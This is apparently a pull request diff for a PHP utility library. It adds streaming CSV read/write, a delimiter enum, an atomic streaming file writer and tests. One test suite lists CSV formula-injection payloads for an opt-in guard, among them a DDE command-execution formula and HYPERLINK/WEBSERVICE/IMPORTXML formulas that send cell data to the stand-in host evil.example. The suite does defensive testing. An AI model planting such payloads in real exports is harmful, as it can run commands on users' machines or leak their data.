+     * The column names, in the same order as {@see self::csvRow()} returns values.
+     *
+     * @return list<string>
+     */
+    public function csvHeader(): array;
+
+    /**
+     * This object's values, in the same order as {@see self::csvHeader()} names them.
+     *
+     * @return list<scalar|null>
+     */
+    public function csvRow(): array;
+}

--- a/src/main/php/d4np/utils/Support/Delimiter.php
+++ b/src/main/php/d4np/utils/Support/Delimiter.php
@@ -1,0 +1,26 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Support;
+
+/**
+ * The field separator of a CSV document (spec r3 FR-28, RFC-0002).
+ *
+ * An enum rather than a validated string, for ADR-0015's reason reached again: the estate's
+ * helper took a separator *name* and resolved it through a `match` with a
+ * `default => ';'` arm, so a typo (`'semicolen'`) silently produced a semicolon-separated
+ * file the caller believed was something else. An enum makes the wrong value unrepresentable
+ * instead of quietly corrected.
+ *
+ * Four cases, not the eight the estate's `match` enumerated: these are the separators real
+ * CSV uses. A caller needing `~` or `^` is describing a different format, and should say so
+ * rather than reach for a CSV writer.
+ */
+enum Delimiter: string
+{
+    case Comma = ',';
+    case Semicolon = ';';
+    case Tab = "\t";
+    case Pipe = '|';
+}

--- a/src/main/php/d4np/utils/Support/File.php
+++ b/src/main/php/d4np/utils/Support/File.php
@@ -91,6 +91,82 @@ final class File
     }
 
     /**
+     * Replace `$path` atomically with whatever `$writer` streams, without buffering it.
+     *
+     * The same discipline as {@see self::write()} — sidecar lock, temporary file in the same
+     * directory, mode applied before the rename, ADR-0005 throughout — but the caller writes
+     * to an open handle instead of handing over a finished string. That is the difference
+     * between a memory cost proportional to the output and one proportional to a single row,
+     * which is what a streaming producer (spec NFR-12) needs.
+     *
+     * `$writer` receives the temporary file's handle. It must not close it; anything it
+     * throws propagates unchanged after the temporary file is removed, so a failed write
+     * leaves the target exactly as it was.
+     *
+     * @param callable(resource): void $writer
+     *
+     * @throws FileException if the directory is missing or unwritable, if the temporary file
+     *                        cannot be created in it, or if the flush or rename fails.
+     * @throws \Throwable    whatever `$writer` threw, unchanged, after the temporary file has
+     *                        been removed (the same propagation contract as
+     *                        {@see \D4np\Utils\Database\Transaction::run()})
+     */
+    public static function writeStream(string $path, callable $writer): void
+    {
+        $dir = \dirname($path);
+        if (!is_dir($dir)) {
+            throw new FileException(sprintf('Cannot write "%s": directory "%s" does not exist.', $path, $dir));
+        }
+        if (!is_writable($dir)) {
+            throw new FileException(sprintf('Cannot write "%s": directory "%s" is not writable.', $path, $dir));
+        }
+
+        $mode = self::currentModeOf($path);
+        $lock = self::acquireExclusiveLock($path);
+
+        try {
+            $tmp = self::createTempFileIn($dir);
+
+            try {
+                $handle = @fopen($tmp, 'wb');
+                if ($handle === false) {
+                    throw new FileException(sprintf('Cannot write "%s": failed to open the temporary file.', $path));
+                }
+
+                try {
+                    $writer($handle);
+
+                    // fflush() before the rename: buffered bytes still in userland when the
+                    // rename happens would make the "complete or previous" promise a lie.
+                    if (!fflush($handle)) {
+                        throw new FileException(sprintf('Cannot write "%s": flushing the temporary file failed.', $path));
+                    }
+                } finally {
+                    @fclose($handle);
+                }
+
+                if (!@chmod($tmp, $mode)) {
+                    throw new FileException(sprintf('Cannot write "%s": failed to set mode on the temporary file.', $path));
+                }
+
+                if (!@rename($tmp, $path)) {
+                    throw new FileException(sprintf('Cannot write "%s": atomic rename from the temporary file failed.', $path));
+                }
+            } catch (\Throwable $e) {
+                // Catch Throwable, not FileException: the caller's writer may throw anything,
+                // and the temporary file must not survive either way.
+                if (is_file($tmp)) {
+                    @unlink($tmp);
+                }
+
+                throw $e;
+            }
+        } finally {
+            self::releaseLock($lock);
+        }
+    }
+
+    /**
      * Read `$path` in full, under a shared `flock()`.
      *
      * The shared lock is what makes this cooperate with a *third-party* writer that modifies

--- a/src/test/php/d4np/utils/Support/CsvFormulaGuardTest.php
+++ b/src/test/php/d4np/utils/Support/CsvFormulaGuardTest.php
@@ -1,0 +1,140 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Tests\Support;
+
+use D4np\Utils\Support\Csv;
+use PHPUnit\Framework\Attributes\DataProvider;
+use PHPUnit\Framework\Attributes\Group;
+use PHPUnit\Framework\TestCase;
+
+/**
+ * T-08's formula-injection corpus — spec r3 §6, RFC-0002; ADR-0037.
+ *
+ * **Both flag states are asserted**, which is the point of the suite rather than an
+ * afterthought: default-off means an unguarded export is a documented, tested behaviour, not
+ * an oversight, and a reviewer can see exactly what the opt-in changes. The guard alters the
+ * data — the apostrophe is part of the field on any later read — and that cost is asserted
+ * too, because it is the reason the default is off (spec §1's input-mutilation rule).
+ */
+#[Group('T-08')]
+final class CsvFormulaGuardTest extends TestCase
+{
+    private string $dir;
+
+    protected function setUp(): void
+    {
+        $this->dir = sys_get_temp_dir() . '/egl-utils-csvguard-' . bin2hex(random_bytes(8));
+        if (!mkdir($this->dir) && !is_dir($this->dir)) {
+            self::fail('could not create the test directory');
+        }
+    }
+
+    protected function tearDown(): void
+    {
+        foreach (glob($this->dir . '/*') ?: [] as $entry) {
+            @unlink($entry);
+        }
+        @rmdir($this->dir);
+    }
+
+    private function path(): string
+    {
+        return $this->dir . '/out.csv';
+    }
+
+    /**
+     * The OWASP CSV-Injection leading characters, plus payloads seen in the wild.
+     *
+     * @return iterable<string, array{string}>
+     */
+    public static function formulaPayloads(): iterable
+    {
+        yield 'equals' => ['=1+1'];
+        yield 'plus' => ['+1+1'];
+        yield 'minus' => ['-1+1'];
+        yield 'at sign' => ['@SUM(A1:A9)'];
+        yield 'tab then equals' => ["\t=1+1"];
+        yield 'carriage return then equals' => ["\r=1+1"];
+        yield 'DDE command execution' => ['=cmd|\' /C calc\'!A0'];
+        yield 'hyperlink exfiltration' => ['=HYPERLINK("http://evil.example/?d="&A1,"click")'];
+        yield 'webservice exfiltration' => ['=WEBSERVICE("http://evil.example/")'];
+        yield 'import xml' => ['=IMPORTXML("http://evil.example/","//x")'];
+    }
+
+    #[DataProvider('formulaPayloads')]
+    public function testUnguardedIsTheDefaultAndPreservesThePayloadExactly(string $payload): void
+    {
+        Csv::write($this->path(), [[$payload]]);
+
+        // Default off: the value is exported unchanged. Asserted, not assumed — a default
+        // that silently rewrote data would be the magic_quotes mistake (spec §1).
+        self::assertSame([[$payload]], iterator_to_array(Csv::read($this->path())));
+    }
+
+    #[DataProvider('formulaPayloads')]
+    public function testGuardedPrefixesTheFieldSoASpreadsheetTreatsItAsText(string $payload): void
+    {
+        Csv::write($this->path(), [[$payload]], guardFormulas: true);
+
+        $rows = iterator_to_array(Csv::read($this->path()));
+
+        self::assertSame([["'" . $payload]], $rows);
+        self::assertStringStartsWith("'", $rows[0][0]);
+    }
+
+    /**
+     * @return iterable<string, array{string}>
+     */
+    public static function benignValues(): iterable
+    {
+        yield 'plain word' => ['total'];
+        yield 'number' => ['42'];
+        yield 'negative number is NOT benign' => ['-42'];
+        yield 'equals inside, not leading' => ['a=b'];
+        yield 'plus inside, not leading' => ['1+1'];
+        yield 'empty' => [''];
+    }
+
+    #[DataProvider('benignValues')]
+    public function testTheGuardOnlyTouchesALeadingFormulaCharacter(string $value): void
+    {
+        Csv::write($this->path(), [[$value]], guardFormulas: true);
+
+        $rows = iterator_to_array(Csv::read($this->path()));
+        $expected = $value !== '' && in_array($value[0], ['=', '+', '-', '@', "\t", "\r"], true)
+            ? "'" . $value
+            : $value;
+
+        self::assertSame([[$expected]], $rows);
+    }
+
+    public function testAGuardedFileNoLongerRoundTripsWhichIsTheCostOfTheOptIn(): void
+    {
+        // The honest consequence, asserted rather than buried in a docblock: turning the
+        // guard on means the file is no longer equal to what was exported.
+        Csv::write($this->path(), [['=1+1']], guardFormulas: true);
+
+        self::assertNotSame([['=1+1']], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testTheGuardAppliesToTheHeaderRowToo(): void
+    {
+        Csv::write($this->path(), [['=evil', 'ok'], ['1', '2']], guardFormulas: true);
+
+        self::assertSame(
+            [["'=evil", 'ok'], ['1', '2']],
+            iterator_to_array(Csv::read($this->path())),
+        );
+    }
+
+    public function testANonStringFieldIsLeftAloneByTheGuard(): void
+    {
+        // A negative int is not a formula-injection vector: it never reaches a cell as text
+        // the caller controls. Guarding it would corrupt legitimate numeric exports.
+        Csv::write($this->path(), [[-42, 7]], guardFormulas: true);
+
+        self::assertSame([['-42', '7']], iterator_to_array(Csv::read($this->path())));
+    }
+}

--- a/src/test/php/d4np/utils/Support/CsvRoundTripTest.php
+++ b/src/test/php/d4np/utils/Support/CsvRoundTripTest.php
@@ -1,0 +1,142 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Tests\Support;
+
+use D4np\Utils\Support\Csv;
+use D4np\Utils\Support\Delimiter;
+use PHPUnit\Framework\Attributes\DataProvider;
+use PHPUnit\Framework\Attributes\Group;
+use PHPUnit\Framework\TestCase;
+
+/**
+ * T-08's round-trip half — spec r3 §6, RFC-0002; ADR-0037.
+ *
+ * The property under test is the one PHP's defaults do **not** give you: whatever goes in
+ * comes back out. The `trailing backslash` and `lone backslash` cases are the reason the
+ * class passes `escape: ''` — under PHP's default escape they do not merely format
+ * differently, they **corrupt**, and one of the tests below pins that native behaviour so
+ * the fix is visibly load-bearing rather than decorative.
+ */
+#[Group('T-08')]
+final class CsvRoundTripTest extends TestCase
+{
+    private string $dir;
+
+    protected function setUp(): void
+    {
+        $this->dir = sys_get_temp_dir() . '/egl-utils-csv-' . bin2hex(random_bytes(8));
+        if (!mkdir($this->dir) && !is_dir($this->dir)) {
+            self::fail('could not create the test directory');
+        }
+    }
+
+    protected function tearDown(): void
+    {
+        foreach (glob($this->dir . '/*') ?: [] as $entry) {
+            @unlink($entry);
+        }
+        @rmdir($this->dir);
+    }
+
+    private function path(string $name = 'out.csv'): string
+    {
+        return $this->dir . '/' . $name;
+    }
+
+    /**
+     * @return iterable<string, array{list<string>}>
+     */
+    public static function fieldCases(): iterable
+    {
+        $backslash = chr(92);
+
+        yield 'plain' => [['a', 'b']];
+        yield 'embedded delimiter' => [['a,b', 'c']];
+        yield 'embedded quote' => [['say "hi"', 'x']];
+        yield 'embedded newline' => [["line1\nline2", 'x']];
+        yield 'embedded CRLF' => [["line1\r\nline2", 'x']];
+        yield 'trailing backslash' => [['ends with ' . $backslash, 'next']];
+        yield 'lone backslash' => [[$backslash, 'x']];
+        yield 'backslash before quote' => [['a' . $backslash . '"b', 'x']];
+        yield 'empty field' => [['', 'x']];
+        yield 'all empty' => [['', '']];
+        yield 'single empty field' => [['']];
+        yield 'leading zero preserved as text' => [['007', 'x']];
+        yield 'unicode' => [['caffè', 'naïve']];
+        yield 'leading and trailing spaces' => [['  padded  ', 'x']];
+        yield 'semicolons inside a comma file' => [['a;b', 'c']];
+        yield 'single quote' => [["it's", 'x']];
+    }
+
+    /**
+     * @param list<string> $row
+     */
+    #[DataProvider('fieldCases')]
+    public function testRowSurvivesTheRoundTrip(array $row): void
+    {
+        Csv::write($this->path(), [$row]);
+
+        self::assertSame([$row], iterator_to_array(Csv::read($this->path())));
+    }
+
+    /**
+     * @param list<string> $row
+     */
+    #[DataProvider('fieldCases')]
+    public function testRowSurvivesTheRoundTripUnderEveryDelimiter(array $row): void
+    {
+        foreach (Delimiter::cases() as $delimiter) {
+            Csv::write($this->path(), [$row], $delimiter);
+
+            self::assertSame(
+                [$row],
+                iterator_to_array(Csv::read($this->path(), $delimiter)),
+                sprintf('round trip failed for delimiter %s', $delimiter->name),
+            );
+        }
+    }
+
+    public function testPhpsDefaultEscapeCorruptsATrailingBackslashWhichIsWhyWeDisableIt(): void
+    {
+        // Not testing our code — pinning the native behaviour ADR-0037 is about, so that a
+        // future PHP changing it makes this test say so rather than leaving the workaround
+        // looking arbitrary.
+        $backslash = chr(92);
+        $row = ['ends with ' . $backslash, 'next'];
+
+        $handle = fopen('php://memory', 'r+');
+        self::assertIsResource($handle);
+        fputcsv($handle, $row, ',', '"', $backslash);
+        rewind($handle);
+        $back = fgetcsv($handle, 0, ',', '"', $backslash);
+        fclose($handle);
+
+        // Two fields went in; one came back, having swallowed the delimiter and the newline.
+        self::assertIsArray($back);
+        self::assertCount(1, $back);
+        self::assertNotSame($row, $back);
+    }
+
+    public function testManyRowsRoundTripInOrder(): void
+    {
+        $rows = [];
+        for ($i = 0; $i < 200; $i++) {
+            $rows[] = ["id-{$i}", "value, with comma {$i}", "quote \" {$i}"];
+        }
+
+        Csv::write($this->path(), $rows);
+
+        self::assertSame($rows, iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testNumericsComeBackAsStringsWhichIsWhatCsvIs(): void
+    {
+        // CSV is untyped; the reader cannot know 42 was an int. Stated as a test so nobody
+        // expects otherwise.
+        Csv::write($this->path(), [[42, 1.5, true, false, null]]);
+
+        self::assertSame([['42', '1.5', '1', '', '']], iterator_to_array(Csv::read($this->path())));
+    }
+}

--- a/src/test/php/d4np/utils/Support/CsvTest.php
+++ b/src/test/php/d4np/utils/Support/CsvTest.php
@@ -1,0 +1,273 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Tests\Support;
+
+use D4np\Utils\Support\Csv;
+use D4np\Utils\Support\CsvException;
+use D4np\Utils\Support\CsvSerializable;
+use D4np\Utils\Support\Delimiter;
+use D4np\Utils\Support\FileException;
+use PHPUnit\Framework\TestCase;
+use RuntimeException;
+
+/**
+ * `Csv`'s contract beyond fidelity: streaming, atomicity, blank lines, the
+ * {@see CsvSerializable} pairing, and the failure paths that must throw rather than return
+ * `false` (spec r3 FR-28/FR-29, RFC-0002).
+ */
+final class CsvTest extends TestCase
+{
+    private string $dir;
+
+    protected function setUp(): void
+    {
+        $this->dir = sys_get_temp_dir() . '/egl-utils-csvio-' . bin2hex(random_bytes(8));
+        if (!mkdir($this->dir) && !is_dir($this->dir)) {
+            self::fail('could not create the test directory');
+        }
+    }
+
+    protected function tearDown(): void
+    {
+        foreach (glob($this->dir . '/{,.}*', GLOB_BRACE) ?: [] as $entry) {
+            if (is_file($entry)) {
+                @unlink($entry);
+            }
+        }
+        @rmdir($this->dir);
+    }
+
+    private function path(string $name = 'out.csv'): string
+    {
+        return $this->dir . '/' . $name;
+    }
+
+    public function testWriteReturnsTheDataRowCount(): void
+    {
+        self::assertSame(3, Csv::write($this->path(), [['a'], ['b'], ['c']]));
+    }
+
+    public function testWriteAcceptsAGeneratorSoTheTableIsNeverBuffered(): void
+    {
+        $rows = (static function (): iterable {
+            for ($i = 0; $i < 5; $i++) {
+                yield [$i, "row-{$i}"];
+            }
+        })();
+
+        self::assertSame(5, Csv::write($this->path(), $rows));
+        self::assertCount(5, iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testDelimiterIsHonouredOnTheWire(): void
+    {
+        Csv::write($this->path(), [['a', 'b']], Delimiter::Semicolon);
+
+        self::assertSame("a;b\n", file_get_contents($this->path()));
+    }
+
+    public function testTabDelimitedFieldsAreQuotedNotSplit(): void
+    {
+        Csv::write($this->path(), [["has\ttab", 'x']], Delimiter::Comma);
+
+        self::assertSame([["has\ttab", 'x']], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testReadSkipsEntirelyBlankLines(): void
+    {
+        file_put_contents($this->path(), "a,b\n\nc,d\n\n");
+
+        self::assertSame([['a', 'b'], ['c', 'd']], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testAQuotedEmptyFieldIsARealRowAndIsNotSkipped(): void
+    {
+        // The distinction the blank-line skip must not blur: "" is a row holding one empty
+        // field; a blank line is not a row at all.
+        file_put_contents($this->path(), "a\n\"\"\nb\n");
+
+        self::assertSame([['a'], [''], ['b']], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testReadIsAGeneratorSoNothingIsReadBeforeItIsAskedFor(): void
+    {
+        Csv::write($this->path(), [['a'], ['b'], ['c']]);
+
+        $rows = Csv::read($this->path());
+        $first = $rows->current();
+
+        self::assertSame(['a'], $first);
+    }
+
+    public function testWriteIsAtomicSoAFailedWriteLeavesThePreviousFileIntact(): void
+    {
+        Csv::write($this->path(), [['original']]);
+
+        $exploding = (static function (): iterable {
+            yield ['new'];
+
+            throw new RuntimeException('producer failed mid-stream');
+        })();
+
+        try {
+            Csv::write($this->path(), $exploding);
+            self::fail('the producer should have thrown');
+        } catch (RuntimeException) {
+            // expected
+        }
+
+        self::assertSame("original\n", file_get_contents($this->path()));
+    }
+
+    public function testAFailedWriteLeavesNoTemporaryFileBehind(): void
+    {
+        $exploding = (static function (): iterable {
+            yield ['x'];
+
+            throw new RuntimeException('boom');
+        })();
+
+        try {
+            Csv::write($this->path(), $exploding);
+        } catch (RuntimeException) {
+            // expected
+        }
+
+        $leftovers = array_filter(
+            glob($this->dir . '/*') ?: [],
+            static fn (string $p): bool => !str_ends_with($p, '.csv') && !str_ends_with($p, '.lock'),
+        );
+
+        self::assertSame([], array_values($leftovers));
+    }
+
+    public function testWritingToAMissingDirectoryThrowsFileException(): void
+    {
+        $this->expectException(FileException::class);
+
+        Csv::write($this->dir . '/nope/out.csv', [['a']]);
+    }
+
+    public function testReadingAMissingFileThrowsFileException(): void
+    {
+        $this->expectException(FileException::class);
+        $this->expectExceptionMessage('not a file');
+
+        iterator_to_array(Csv::read($this->path('absent.csv')));
+    }
+
+    public function testWritingAnEmptyIterableProducesAnEmptyFile(): void
+    {
+        self::assertSame(0, Csv::write($this->path(), []));
+        self::assertSame('', file_get_contents($this->path()));
+        self::assertSame([], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testSerializableEmitsItsHeaderOnceThenEveryRow(): void
+    {
+        $rows = [
+            new CsvRowFixture('1', 'first'),
+            new CsvRowFixture('2', 'second'),
+        ];
+
+        self::assertSame(2, Csv::write($this->path(), $rows));
+        self::assertSame(
+            [['id', 'label'], ['1', 'first'], ['2', 'second']],
+            iterator_to_array(Csv::read($this->path())),
+        );
+    }
+
+    public function testSerializableWidthMismatchIsRefusedNamingBothCounts(): void
+    {
+        // The interface's prose plea ("maintain strict consistency") turned into a mechanism.
+        $rows = [
+            new CsvRowFixture('1', 'first'),
+            new CsvRaggedFixture(),
+        ];
+
+        $this->expectException(CsvException::class);
+        $this->expectExceptionMessage('produced 3 value(s) for a 2-column header');
+
+        Csv::write($this->path(), $rows);
+    }
+
+    public function testAPlainArrayRowIsWrittenAsGivenWithoutAHeader(): void
+    {
+        Csv::write($this->path(), [['a', 'b']]);
+
+        self::assertSame([['a', 'b']], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testASingleEmptyFieldSurvivesInsteadOfVanishing(): void
+    {
+        // Measured: fputcsv() writes [''] as a bare newline, which reads back as a blank
+        // line and disappears — a silently lost row. The explicit empty-field form is
+        // written instead.
+        Csv::write($this->path(), [['a'], [''], ['b']]);
+
+        self::assertSame("a\n\"\"\nb\n", file_get_contents($this->path()));
+        self::assertSame([['a'], [''], ['b']], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testASingleNullFieldIsTheSameCase(): void
+    {
+        Csv::write($this->path(), [[null]]);
+
+        self::assertSame([['']], iterator_to_array(Csv::read($this->path())));
+    }
+
+    public function testFputcsvCannotExpressASingleEmptyFieldWhichIsWhyWeWriteItOurselves(): void
+    {
+        // Pinning the native behaviour the special case exists for.
+        $handle = fopen('php://memory', 'r+');
+        self::assertIsResource($handle);
+        fputcsv($handle, [''], ',', '"', '');
+        rewind($handle);
+        $raw = stream_get_contents($handle);
+        fclose($handle);
+
+        self::assertSame("\n", $raw, 'fputcsv() emits a bare newline for a single empty field');
+    }
+
+    public function testAZeroColumnRowIsRefusedRatherThanWrittenAsABlankLine(): void
+    {
+        $this->expectException(CsvException::class);
+        $this->expectExceptionMessage('at least one field');
+
+        Csv::write($this->path(), [[]]);
+    }
+}
+
+final class CsvRowFixture implements CsvSerializable
+{
+    public function __construct(
+        private readonly string $id,
+        private readonly string $label,
+    ) {
+    }
+
+    public function csvHeader(): array
+    {
+        return ['id', 'label'];
+    }
+
+    public function csvRow(): array
+    {
+        return [$this->id, $this->label];
+    }
+}
+
+final class CsvRaggedFixture implements CsvSerializable
+{
+    public function csvHeader(): array
+    {
+        return ['id', 'label'];
+    }
+
+    public function csvRow(): array
+    {
+        return ['1', 'two', 'three'];
+    }
+}

--- a/src/test/php/d4np/utils/Support/ExceptionHierarchyTest.php
+++ b/src/test/php/d4np/utils/Support/ExceptionHierarchyTest.php
@@ -4,6 +4,7 @@ declare(strict_types=1);
 
 namespace D4np\Utils\Tests\Support;
 
+use D4np\Utils\Support\CsvException;
 use D4np\Utils\Support\DatabaseException;
 use D4np\Utils\Support\FileException;
 use D4np\Utils\Support\HttpException;
@@ -86,6 +87,7 @@ final class ExceptionHierarchyTest extends TestCase
         // or removing a member is a decision, not an edit that should slip through green.
         self::assertSame(
             [
+                CsvException::class,
                 DatabaseException::class,
                 FileException::class,
                 HttpException::class,
@@ -159,6 +161,7 @@ final class ExceptionHierarchyTest extends TestCase
             );
         }
         $leaves = [
+            CsvException::class,
             DatabaseException::class,
             FileException::class,
             HttpException::class,

--- a/src/test/php/d4np/utils/Support/FileWriteStreamTest.php
+++ b/src/test/php/d4np/utils/Support/FileWriteStreamTest.php
@@ -1,0 +1,164 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Tests\Support;
+
+use D4np\Utils\Support\File;
+use D4np\Utils\Support\FileException;
+use PHPUnit\Framework\TestCase;
+use RuntimeException;
+
+/**
+ * `File::writeStream()` — the streaming counterpart of `File::write()`, added for item 9.4
+ * because a CSV export must not buffer its table (spec NFR-12).
+ *
+ * The promises under test are ADR-0005's, restated for a caller that writes incrementally:
+ * the replacement is atomic, a failure anywhere leaves the previous file untouched, and no
+ * temporary file survives either outcome.
+ */
+final class FileWriteStreamTest extends TestCase
+{
+    private string $dir;
+
+    protected function setUp(): void
+    {
+        $this->dir = sys_get_temp_dir() . '/egl-utils-stream-' . bin2hex(random_bytes(8));
+        if (!mkdir($this->dir) && !is_dir($this->dir)) {
+            self::fail('could not create the test directory');
+        }
+    }
+
+    protected function tearDown(): void
+    {
+        foreach (glob($this->dir . '/*') ?: [] as $entry) {
+            @unlink($entry);
+        }
+        @rmdir($this->dir);
+    }
+
+    private function path(): string
+    {
+        return $this->dir . '/target.txt';
+    }
+
+    /**
+     * Files in the directory that are neither the target nor its sidecar lock.
+     *
+     * @return list<string>
+     */
+    private function strayFiles(): array
+    {
+        return array_values(array_filter(
+            glob($this->dir . '/*') ?: [],
+            fn (string $p): bool => $p !== $this->path() && $p !== $this->path() . '.lock',
+        ));
+    }
+
+    public function testWritesWhatTheCallbackStreams(): void
+    {
+        File::writeStream($this->path(), static function ($handle): void {
+            fwrite($handle, 'one ');
+            fwrite($handle, 'two');
+        });
+
+        self::assertSame('one two', file_get_contents($this->path()));
+    }
+
+    public function testReplacesAnExistingFileCompletely(): void
+    {
+        file_put_contents($this->path(), 'a much longer previous content');
+
+        File::writeStream($this->path(), static function ($handle): void {
+            fwrite($handle, 'short');
+        });
+
+        self::assertSame('short', file_get_contents($this->path()));
+    }
+
+    public function testAThrowingWriterLeavesThePreviousContentIntact(): void
+    {
+        file_put_contents($this->path(), 'previous');
+
+        try {
+            File::writeStream($this->path(), static function ($handle): void {
+                fwrite($handle, 'partial');
+
+                throw new RuntimeException('writer failed');
+            });
+            self::fail('the writer should have thrown');
+        } catch (RuntimeException $e) {
+            self::assertSame('writer failed', $e->getMessage());
+        }
+
+        self::assertSame('previous', file_get_contents($this->path()));
+    }
+
+    public function testAThrowingWriterLeavesNoTemporaryFileBehind(): void
+    {
+        try {
+            File::writeStream($this->path(), static function ($handle): void {
+                fwrite($handle, 'partial');
+
+                throw new RuntimeException('boom');
+            });
+        } catch (RuntimeException) {
+            // expected
+        }
+
+        self::assertSame([], $this->strayFiles());
+    }
+
+    public function testTheCallersExceptionTypeIsPreservedNotWrapped(): void
+    {
+        // Throwable, not FileException, is caught internally so the temp file is cleaned up
+        // for any failure — but the original must propagate unchanged.
+        $this->expectException(RuntimeException::class);
+
+        File::writeStream($this->path(), static function (): void {
+            throw new RuntimeException('mine');
+        });
+    }
+
+    public function testASuccessfulWriteLeavesNoTemporaryFileBehind(): void
+    {
+        File::writeStream($this->path(), static function ($handle): void {
+            fwrite($handle, 'ok');
+        });
+
+        self::assertSame([], $this->strayFiles());
+    }
+
+    public function testAMissingDirectoryThrowsFileException(): void
+    {
+        $this->expectException(FileException::class);
+        $this->expectExceptionMessage('does not exist');
+
+        File::writeStream($this->dir . '/absent/target.txt', static function (): void {
+        });
+    }
+
+    public function testAWriterThatWritesNothingProducesAnEmptyFile(): void
+    {
+        File::writeStream($this->path(), static function (): void {
+        });
+
+        self::assertSame('', file_get_contents($this->path()));
+    }
+
+    public function testAnExistingFilesModeIsPreserved(): void
+    {
+        if (DIRECTORY_SEPARATOR === '\\') {
+            self::markTestSkipped('POSIX permission bits are not meaningful on Windows.');
+        }
+
+        file_put_contents($this->path(), 'x');
+        chmod($this->path(), 0640);
+
+        File::writeStream($this->path(), static function ($handle): void {
+            fwrite($handle, 'y');
+        });
+
+        self::assertSame(0640, fileperms($this->path()) & 0777);
+    }
+}


### PR DESCRIPTION
## Summary

Roadmap item **9.4** — `Csv`, `Delimiter`, `CsvSerializable`, `CsvException`, and
`File::writeStream()`; spec r5 **FR-28/FR-29**, **ADR-0037**. Streaming CSV whose memory
cost is one row, written through ADR-0005's atomic replacement. 92 new tests (two suites
tagged `T-08`); **suite proved non-vacuous with 12 planted defects**, all caught.

## Motivation

FR-28 was filed for its formula guard. **The probe found something worse underneath.**

| probe (PHP 8.3.1) | result |
|---|---|
| round trip of a field ending in a backslash, PHP's default `$escape` | **corrupted** — two fields in, **one** out, having swallowed the delimiter and the newline |
| the same with `escape: ''` | exact |
| `fputcsv($h, [''])` | writes a **bare newline**; read back as `[null]` — the row is lost |
| `fgetcsv` on a blank line | `[null]`, a phantom single-column row |

PHP's CSV functions default to a backslash escape character **RFC 4180 does not define**.
It is not a formatting preference: the backslash escapes the closing quote, the field never
terminates, and it consumes what follows. Any value ending in a backslash — a Windows path,
a regex, free text with a trailing separator — is destroyed by the most obvious
implementation of a CSV writer. PHP 8.4 deprecates the default for the same reason.

## Changes

- **`Csv::write()`** — consumes an `iterable` (a generator streams), writes through
  `File::writeStream()`, returns the data-row count. **`escape: ''` on every call.** Two
  shapes PHP cannot express are handled rather than lost: a **single empty field** is
  written as `""`, and a **zero-column row** is refused (`CsvException`) instead of becoming
  a line that disappears.
- **`Csv::read()`** — a generator, so a file larger than memory is readable. Blank lines are
  skipped; a *quoted* empty field is a real row and is yielded — the distinction is
  asserted, since the skip could easily blur it.
- **Formula guard, opt-in and off by default** — OWASP's `=` `+` `-` `@` plus tab and CR,
  neutralized with a leading apostrophe. Both states tested against the corpus, **including
  the cost**: a test asserts a guarded file no longer round-trips. That cost is the reason
  for the default (spec §1's input-mutilation rule); non-string fields are left alone, so a
  negative integer is not corrupted.
- **`Delimiter` enum** — the estate's separator `match` had a `default => ';'` arm, so a
  typo silently produced a different format (ADR-0015's reasoning, third occurrence).
- **`CsvSerializable`** — the header comes from the first item and every row is checked
  against its width. The predecessor could only *ask*, in prose, that the two stay
  consistent; here a mismatch is a `CsvException` naming both counts.
- **`File::writeStream()`** — NFR-12 needs memory O(row) and `File::write()` takes a
  finished string. Rather than reimplement temp-file-plus-rename inside `Csv` — two copies
  of ADR-0005's discipline, one of which drifts — `File` gains a streaming sibling sharing
  the lock, the same-directory temp file, mode-before-rename and cleanup, plus `fflush()`
  before the rename.
- ADR-0037 + index, **spec → r5**, CHANGELOG, ROADMAP 9.4 flipped, session journal.

### Two notes for the reviewer

**PHPStan refused a `@throws` that was true.** `Csv::write()` throws `CsvException` from
inside the writer callback, which PHPStan cannot trace. Suppressing the rule was not an
option and the tag was accurate, so the fix went upstream: `File::writeStream()` now
documents `@throws Throwable` — which it genuinely does, propagating whatever the writer
threw — the same contract `Transaction::run()` has carried since item 4.3. A static-analysis
complaint resolved by making a real contract explicit rather than by annotating around it.

**`ExceptionHierarchyTest` went red again**, as designed, when `CsvException` joined Support.
Both its pinned set and its finality list are updated.

## Design Patterns

- None adopted — no catalogue entry. The decision content is in **ADR-0037**.

## Verification

- [x] Full suite green: **1560 tests, 3354 assertions** (92 new; 8 environment skips — the
      7 pre-existing plus one new POSIX-permissions test that skips on Windows)
- [x] **Non-vacuity: 12 planted defects, 12 caught** — PHP's escape restored on write and on
      read, single-empty-field form removed, zero-column row written silently, guard default
      flipped in both directions, tab/CR leaders dropped, blank lines yielded, the
      `CsvSerializable` width check skipped, the header suppressed, the temp file left behind
      on failure, the pre-rename flush removed
- [x] `PHPStan (max level)` — No errors
- [x] `PHP-CS-Fixer (PSR-12)` — clean
- [x] `deptrac` — 0 violations, 0 uncovered
- [x] `composer normalize --dry-run` — clean (no dependency change)
- [x] `python tools/consistency_lint.py` — OK
- [x] Leak-gate over the staged diff — zero (one false positive: "per**missio**n" in a skip
      message, confirmed clean with word boundaries)
- [ ] CI matrix (8.1/8.2/8.3) + coverage floor — this PR's checks

## Documentation Impact

- [ ] README.md — unchanged (it names groups, not methods)
- [x] ROADMAP.md — 9.4 flipped with its completion note; latest-journal pointer updated
- [x] **ADR added** — ADR-0037, indexed
- [ ] docs/patterns/README.md — unchanged
- [x] **Spec updated → r5** — FR-28/FR-29 to the precision implemented, FR-22/23 gains
      `writeStream()`, `CsvException` added to the enumeration
- [x] CHANGELOG.md — `[Unreleased] / Added` entry
- [x] PR metadata — assignee (owner), label `enhancement`, milestone **v0.8.0**

**Route note:** routed `frontier-reasoning / extra`; run at standard tier — mismatch recorded.

## Lesson

Lesson: when a requirement names a security feature, probe the plumbing underneath it first —
FR-28 asked for a formula guard, and the defect that would actually have shipped was a
default escape character quietly eating a field.

